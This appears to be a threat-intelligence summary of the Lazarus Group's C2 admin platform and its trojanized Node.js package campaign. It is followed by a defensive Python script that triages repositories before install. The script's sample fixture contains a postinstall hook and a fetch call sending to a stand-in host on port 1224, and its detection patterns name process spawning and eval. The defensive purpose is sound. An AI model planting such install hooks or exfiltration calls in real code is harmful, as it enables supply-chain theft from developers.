
The notorious North Korean hacking collective, Lazarus Group, has implemented a sophisticated web-based administrative platform to manage their command-and-control (C2) operations. SecurityScorecard’s STRIKE team has uncovered this centralized system, which consists of a React application frontend and Node.js API backend.
This administrative framework serves as the backbone of Operation Phantom Circuit, a large-scale supply chain attack targeting the cryptocurrency sector and developers worldwide. The operation involves distributing trojanized versions of legitimate Node.js software packages containing hidden backdoors.
Key Findings:
– 1,639 total victims worldwide, with 233 targeted in January 2025
– Primary targets located in Brazil, France, and India (110 victims in India alone)
– The attack vector uses LinkedIn for social engineering: targets are approached with fake job opportunities
– Infrastructure employs Astrill VPN and Oculus Proxy endpoints for communication
The platform enables attackers to:
– Manage exfiltrated data
– Monitor compromised systems
– Control payload delivery
– Filter and search stolen information
Technical Details:
– Communication occurs over port 1224
– Uses React-based admin panels
– Implements Node.js APIs for backend operations
– Connects through multiple VPN layers to North Korean IP addresses
The campaign specifically targets developers by embedding malicious code into repositories, often disguised as coding tests or interview assignments. This sophisticated approach has allowed the Lazarus Group to infiltrate numerous organizations globally while maintaining centralized control over their operations.
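A pre-install triage check a defender could run over a repository received as a "coding test", added here as an example (not code from the SecurityScorecard report): it flags npm lifecycle hooks that execute automatically on install, JavaScript that spawns processes or evaluates dynamic code, and hardcoded endpoints on port 1224. The regex heuristics and the sample repository are constructed assumptions, not indicators taken from the report.

```python
"""Offline triage of a Node.js repository before running `npm install`.

Added example; the heuristics below are assumptions derived from the
page (trojanized Node.js packages, C2 on port 1224), not report indicators.
"""
import json
import re

# npm lifecycle hooks that run automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic patterns (assumptions, not indicators from the report).
PORT_1224 = re.compile(r":1224\b")
SUSPICIOUS_JS = re.compile(r"\b(?:eval|Function)\s*\(|child_process")


def scan_package_json(text):
    """Return findings for install-time hooks declared in package.json."""
    try:
        pkg = json.loads(text)
    except json.JSONDecodeError:
        return ["package.json is not valid JSON"]
    return [f"lifecycle hook '{hook}' runs on install: {cmd}"
            for hook, cmd in (pkg.get("scripts") or {}).items()
            if hook in LIFECYCLE_HOOKS]


def scan_js_source(path, text):
    """Return findings for port-1224 endpoints and dynamic execution."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if PORT_1224.search(line):
            findings.append(f"{path}:{lineno}: endpoint on port 1224")
        if SUSPICIOUS_JS.search(line):
            findings.append(f"{path}:{lineno}: dynamic code execution / process spawn")
    return findings


def triage_repo(files):
    """files: mapping of relative path -> file content (runs fully offline)."""
    findings = []
    for path, text in files.items():
        if path.endswith("package.json"):
            findings.extend(scan_package_json(text))
        elif path.endswith(".js"):
            findings.extend(scan_js_source(path, text))
    return findings


# Constructed sample repository (TEST-NET address), not a real sample.
SAMPLE_REPO = {
    "package.json": '{"name":"interview-task","scripts":{"postinstall":"node lib/setup.js","test":"jest"}}',
    "lib/setup.js": "const cp = require('child_process');\nfetch('http://203.0.113.5:1224/collect');\n",
    "src/index.js": "module.exports = (a, b) => a + b;\n",
}

if __name__ == "__main__":
    for finding in triage_repo(SAMPLE_REPO):
        print(finding)
```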